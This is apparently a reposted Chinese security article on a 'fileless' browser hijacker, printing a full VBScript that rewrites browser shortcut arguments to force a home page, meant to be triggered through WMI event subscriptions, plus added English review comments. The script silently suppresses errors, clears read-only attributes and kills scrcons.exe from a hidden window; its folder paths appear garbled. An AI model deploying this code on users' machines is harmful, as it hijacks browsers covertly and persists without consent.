Fileless Browser Hijacker劫持浏览器首页

所属分类:安全文章

From:
http://zone.wooyun.org/content/26997

http://blog.zemana.com/2016/04/yeabestscc-fileless-browser-hijacker_24.html
---
0x00 简介
vbs脚本,执行后会改写常见浏览器快捷方式(.lnk)的启动参数,使浏览器从快捷方式启动时打开指定页面,效果上相当于修改了主页(浏览器自身的主页设置并未改动)
通过wmi定时调用此脚本可实现无文件劫持浏览器主页,即脚本由WMI事件订阅触发执行,而不是以独立脚本文件的形式存放在磁盘上
原文已给出防御和检测方法,所以此处从略;排查时的重点是浏览器快捷方式的启动参数以及系统中的WMI永久事件订阅
---
0x01 应用
技术不分好坏
我们学习了这个技巧同样可以用来锁定自己的浏览器
vbs代码如下,主页锁定为http://www.baidu.com 

' Purpose: walk a fixed list of Desktop / Start Menu / Quick Launch folders and,
' for every .lnk shortcut whose target is one of the listed browser executables,
' overwrite the shortcut's arguments with the URL in `link`. The browser then
' opens that URL when started from the shortcut; the browser's own home-page
' setting is never touched by this script.
'
' Review notes (what this leaves behind on a host):
'  - browser shortcuts whose Arguments field holds a URL, with the read-only
'    attribute cleared;
'  - a hidden "cmd /c taskkill /f /im scrcons.exe" child process at the end of
'    each run;
'  - when the script is driven by WMI as the article describes, a permanent
'    event subscription (filter, consumer and binding) in the WMI repository.
Dim objFS
' NOTE(review): objFS is created but never used below; the folder walk uses the
' second FileSystemObject instance, `fso`.
Set objFS = CreateObject("Scripting.FileSystemObject")
' From here on every runtime error is ignored, so missing folders, unreadable
' shortcuts and failed saves are skipped without any message.
On Error Resume Next
' URL that is written into each matching shortcut's arguments.
Const link = "http://www.baidu.com"
' Executable names that count as "a browser" when found as a shortcut target.
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
' Lookup table keyed by the lower-cased executable name, for a case-insensitive match.
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
BrowserDic.Add LCase(browser), browser
Next
' Upper bound 12 gives 13 slots (0..12); only 0..11 are filled, so slot 12 stays Empty.
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
' NOTE(review): the folder strings below contain no path separators; they were
' presumably lost when the page was extracted, and as printed they are not valid
' paths. They also look hard-coded to drive C: and one user profile ("a")
' instead of being resolved per user - confirm against the original article.
FoldersDic(0) = "C:UsersPublicDesktop"
FoldersDic(1) = "C:ProgramDataMicrosoftWindowsStart Menu"
FoldersDic(2) = "C:ProgramDataMicrosoftWindowsStart MenuPrograms"
FoldersDic(3) = "C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup"
FoldersDic(4) = "C:UsersaDesktop"
FoldersDic(5) = "C:UsersaAppDataRoamingMicrosoftWindowsStart Menu"
FoldersDic(6) = "C:UsersaAppDataRoamingMicrosoftWindowsStart MenuPrograms"
FoldersDic(7) = "C:UsersaAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup"
FoldersDic(8) = "C:UsersaAppDataRoaming"
FoldersDic(9) = "C:UsersaAppDataRoamingMicrosoftInternet ExplorerQuick Launch"
FoldersDic(10) = "C:UsersaAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenu"
FoldersDic(11) = "C:UsersaAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
' The loop runs to UBound (12), so it also visits the unassigned slot; that
' lookup presumably fails and the error is hidden by On Error Resume Next.
For i = 0 To UBound(FoldersDic)
' Only the files directly inside each folder are examined; subfolders are not descended into.
For Each file In fso.GetFolder(FoldersDic(i)).Files
  If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
   set oShellLink = WshShell.CreateShortcut(file.Path)
   path = oShellLink.TargetPath
   ' Rebuild "name.ext" from the shortcut target so it can be matched against the browser list.
   name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
   If BrowserDic.Exists(LCase(name)) Then
    ' Replaces whatever arguments the shortcut had before; the old value is not kept anywhere.
    oShellLink.Arguments = link
    ' Bit 1 is the read-only file attribute; it is cleared so the save can
    ' succeed and is not set again afterwards.
    If file.Attributes And 1 Then
     file.Attributes = file.Attributes - 1
    End If
    oShellLink.Save
   End If
  End If
Next
Next
' Force-terminates every process named scrcons.exe from a hidden window (window
' style 0) without waiting for the result. scrcons.exe is the host process
' Windows uses for WMI script event consumers, so this presumably removes the
' host that ran the script - TODO confirm against the original article.
createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0


执行后会更改系统中浏览器的主页,如图


本文始发于微信公众号(关注安全技术):Fileless Browser Hijacker劫持浏览器首页
